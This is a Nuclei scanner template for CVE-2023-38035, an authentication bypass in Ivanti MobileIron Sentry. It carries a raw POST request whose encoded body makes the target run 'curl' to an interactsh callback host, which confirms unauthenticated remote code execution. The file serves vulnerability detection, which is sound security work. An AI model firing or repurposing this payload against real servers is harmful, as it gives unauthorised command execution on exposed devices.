id: CVE-2023-38035 info: name: Ivanti Sentry - Authentication Bypass author: DhiyaneshDk,iamnoooob,rootxharsh severity: critical description: | A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration. remediation: | Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability. reference: - https://forums.ivanti.com/s/article/CVE-2023-38035-API-Authentication-Bypass-on-Sentry-Administrator-Interface - https://www.horizon3.ai/ivanti-sentry-authentication-bypass-cve-2023-38035-deep-dive/ - https://github.com/horizon3ai/CVE-2023-38035 - https://nvd.nist.gov/vuln/detail/CVE-2023-38035 - http://packetstormsecurity.com/files/174643/Ivanti-Sentry-Authentication-Bypass-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-38035 cwe-id: CWE-863 epss-score: 0.9704 epss-percentile: 0.99694 cpe: cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ivanti product: mobileiron_sentry shodan-query: 'html:"Note: Requires a local Sentry administrative user"' tags: packetstorm,cve,cve2023,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast variables: oast: "{{interactsh-url}}/?" padstr: "{{randstr}}" http: - raw: - | POST /mics/services/MICSLogService HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}} matchers: - type: dsl dsl: - contains(body, 'isRunningTzz') - contains(interactsh_protocol, 'dns') - status_code == 200 condition: and # digest: 490a0046304402201b4ca0af83495f4b4bb28709be804ef26d2fb868a90351deb604353ec1f0b8e302200c1289d459296184fbb65d3c44fa69247899fcef33b35dac10f9cedeebda6e09:922c64590222798bb761d5b6d8e72950